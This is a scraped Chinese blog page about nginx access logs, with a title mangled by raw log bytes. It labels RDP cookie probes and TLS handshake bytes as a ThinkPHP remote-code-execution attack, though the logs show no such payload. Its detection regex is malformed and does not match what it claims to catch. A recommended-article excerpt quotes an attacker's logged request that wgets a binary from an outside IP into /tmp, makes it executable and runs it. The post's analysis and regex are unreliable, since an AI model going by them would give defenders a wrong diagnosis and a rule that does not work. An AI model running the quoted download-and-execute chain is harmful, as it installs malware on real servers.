\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr针对thinkphp的远程代码执行漏洞进行的攻击

最新推荐文章于 2024-04-29 14:37:39 发布
最新推荐文章于 2024-04-29 14:37:39 发布
阅读量8.7k 收藏 1
点赞数 3
文章标签: nginx
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lsd19880914/article/details/108142368
版权 
106.14.83.56 - - [20/Aug/2020:10:21:54 +0800] "GET / HTTP/1.0" 403 162 "-" "-"
106.14.83.56 - - [20/Aug/2020:10:22:05 +0800] "GET / HTTP/1.0" 403 162 "-" "-"
106.14.83.56 - - [20/Aug/2020:10:22:05 +0800] "GET / HTTP/1.1" 403 162 "-" "-"
47.100.130.114 - - [20/Aug/2020:11:27:27 +0800] "GET / HTTP/1.0" 403 162 "-" "-"
79.124.62.254 - - [20/Aug/2020:16:25:36 +0800] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 166 "-" "-"
101.133.224.44 - - [20/Aug/2020:16:44:43 +0800] "\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\x8Fe\xA3S\x98\x8B:\x94\xF0~\x0B\xA1\xD5\x1A\xAB\x0C\xE8\xD3\xD8\xC4X\x1A]\x12]Q\xD9\xB5i\xC8\x96\xF0 \x96\x8C" 400 166 "-" "-"
101.133.224.44 - - [20/Aug/2020:16:44:43 +0800] "GET / HTTP/1.1" 400 568 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
194.61.55.107 - - [21/Aug/2020:06:34:26 +0800] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 166 "-" "-"
194.61.55.107 - - [21/Aug/2020:06:34:27 +0800] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 166 "-" "-"

针对thinkphp的远程代码执行漏洞进行的攻击,下面写了一个正则表达式针对此攻击

正则表达式:

\[function|exec|sh]$

剩下那个cookie没啥用,就不匹配了

ces0135
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
nginx从入门到实践》学习笔记2
weixin_41931602的博客
05-22 1719
2-1 中间件是什么? NGINX是一个开源且高性能,可靠的HTTP中间件,代理服务。 2-2 常见的HTTP服务:HTTPD,IIS,GWS 2-3/4/5/6 为什么选择nginx? IO多路复用epoll:(多个描述符的I/O一个线程里并发交替的完成),实现并发和吞吐 轻量级:功能模块少(出于性能考虑,源代码只保留核心代码),代码模块化(易读,可以二次改进,比如阿里的teng...
软件测试/测试开发 | 电商业务的性能测试(一): 必备基础知识
Ceshiren666的博客
03-13 200
软件测试/测试开发 | 电商业务的性能测试(一): 必备基础知识
漏洞利用
qq_44960788的博客
02-27 295
一,FTP漏洞利用 FTP协议:文件传输协议,是用于在网络上进行文件传输的一套标准协议使用C/S模式。属于应用层。使用21号端口。 用户分类:1,Real用户 2,Administrator 3,匿名用户 FTP文件传输格式:ASCII,二进制 ...
nmap扫描工控设备的脚本支持
最新发布
小人物的编程
04-29 924
介绍了nmap脚本使用
通过response实现请求重定向
旭小宁的专栏
11-06 371
package com.csdn.response; import java.io.IOException; import javax.servlet.ServletException; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.ser
利用nginx解决cookie跨域访问的方法
xwnxwn的专栏
08-12 2578
最近需要把阿里云上的四台服务器的项目迁移到客户提供的新的项目中,原来的四台服务器中用到了一级域名和二级域名。比如aaa.abc.com 和bbb.abc.com 和ccc.abc.com。其中aaa.abc.com登录,通过把cookie中的信息setDomain给.abc.com。其他系统可以共享这个cookie。但是新的四台服务器中并没有申请域名,只有四个ip: 192.168.0.1 单点登录服务器 192.168.0.2 192.168.0.3 192.168.0.4 因为每台服务器...
使用Java定时从Nginx的日志中获取黑客的ip并加入访问黑名单
皓亮君的博客
01-16 6377
文章目录简介使用nginx的deny属性禁止黑名单IP访问Java工具类1.定义恶意攻击代码信息列表2.解析nginx日志中的非法访问的IP地址3.写入nginx的黑名单文件中4.工具类集成方法5.测试Main函数定时执行工具类的方式1.把工具类打包成jar,然后写入到linux的crontab事件中2.使用Java定时任务实现实战效果 简介 最近发现公司线上的应用老出现访问异常的情况,排查nginx的access.log日志文件,发现了大量恶意攻击代码,内容如下 主要内容为"\x03\x00\x00/
计算机端口疑是被攻击
DavidRobinx的博客
08-20 2352
最近我们公司的一个服务程序监测到端口6000收到一帧数据, 001 000 008 000 000 000 000 000 003 000 000% 002 0F0 080d 000 000 003 0EBp 080 016 016 000 017 000 0E9 003 000 000 000 000 000 001 008 000$ 000 000 000 001 000 0EA 003 00...
sl4a-r6x04-armv7
05-22
SL4A开发APK文档集合之 sl4a-r6 sl4a-r6x04-armv7
8x8LEDMatrixHelper_instancecpn_www8x8com_Creating_www.8x8_www.8x
10-02
8x8LEDMatrixHelper是一个专为在8x8 LED矩阵上创建图像的程序。这个工具主要面向电子爱好者、程序员和教育工作者,它提供了一个简单易用的界面来设计和显示各种图形或文字在LED矩阵上。LED矩阵是电子项目中常见的...
stylex03
03-06
"款式x03"可能是对这个项目特定版本或风格的描述,暗示它可能提供了不同的样式方案或布局选项,以满足多样化的设计需求。 JavaScript是Web开发的基石,它允许开发者创建交互式的动态网页。它的主要功能包括操作DOM...
自定义抖动效果库
03-18
在IT行业中,自定义抖动效果库是一种用于创建动态视觉效果的工具,尤其适用于游戏开发、用户界面设计以及动画制作等领域。抖动效果通常被用来模拟物体不稳定的运动,增加趣味性或者强调某一操作,例如错误提示或者...
ThinkSysten SR550 Product Guide
11-28
Lenovo ThinkSystem SR550 Server Product Guide 7X03/7X04型 服务器红皮书
【网络安全】 关于http服务器遭受webshell攻击
jn10010537的博客
09-17 3015
【windows10】 关于http服务器遭受webshell攻击1、背景2、ip地址查询3、可疑请求ip 1、背景 在阿里云公网上部署web服务器,最近客户反映我的服务经常断掉,查看后台日志,发现境外的IP攻击。 比如: 209.141.56.212 - - [17/Sep/2021 04:52:04] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/154.16.118.104/arm7;chmod+777+arm7;./arm7+0day.jawsv
Ubuntu18.04 【ELK+Nginx】logstash安装、收集、解析和转换日志
lengyer的博客
12-10 1667
上篇的博客完成了Es的单台服务器架设 https://blog.csdn.net/lengyer/article/details/110919426 一、安装logstash 下载logstash-7.3.2的安装包,版本要和Es的一样 https://artifacts.elastic.co/downloads/logstash/logstash-7.3.2.tar.gz 解压: tar zxvf logstash-7.3.2.tar.gz mv logstash-7.3.2 /etc/
爬虫学习笔记(2)
weixin_44602227的博客
01-12 494
爬虫学习 注:本笔记使用jupyter编写。 web前端知识 jupyter 可以直接运行html和javascript只需要在代码前面加上%%html或者%%javascript %%html <html> <head> <title>python爬虫开发与项目实战</title> <meta charset='UTF-8'> </head> <body>
BugKu 杂项-这么多数据包
weixin_30673715的博客
08-12 640
前边的都是些无关紧要,只要有点网络的基础我想应该都能懂,往下看,一直到NO104,这是在干什么? 源ip138一直向目标ip159发送syn握手包,想要建立连接,其实就是端口扫描,原理就是,想和你某个端口建立连接,然后看这个端口的回复的类型来看下是否开放了此端口。我们现在就可以知道138是客户端,159是服务器端了。红色的包是服务器向客户端回复的信息,代表此端口没有开放。 再往下看,服务器的33...
最近看到了一个远航财经直播不知道是用什么技术实现的
lsd19880914的博客
09-26 306
自己也想做个财经直播的系统,搜索了下就出来了远航财经直播这个系统,进里面看了下,基本的功能都是能满足我的,还就是我也对比了好几家的这样的系统,聊天这一块大多是ajax轮询的, 就是在实际的使用过程中是有时间限制的,还有就是感觉轮询的东西在线人数多服务器就吃不消了,不打算用这种技术实现,还有这个远航财经直播的聊天基本是秒显的,就是和QQ那样的,显示很快的,不知道是用什么技术实现的,这个里有一个他们的
用python将b'/x8e/x00/x01/x02/x03/x04/x00/xe8'转为16进制数组
05-31
可以使用Python中的bytes.fromhex()方法将字节串转换为十六进制字符串,再使用int()函数将其转为整数。然后将整数放入列表中即可。 以下是示例代码: ``` byte_str = b'\x8e\x00\x01\x02\x03\x04\x00\xe8' hex_str = ''.join(['{:02x}'.format(b) for b in byte_str]) hex_list = [int(hex_str[i:i+2], 16) for i in range(0, len(hex_str), 2)] print(hex_list) ``` 输出结果为: ``` [142, 0, 1, 2, 3, 4, 0, 232] ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值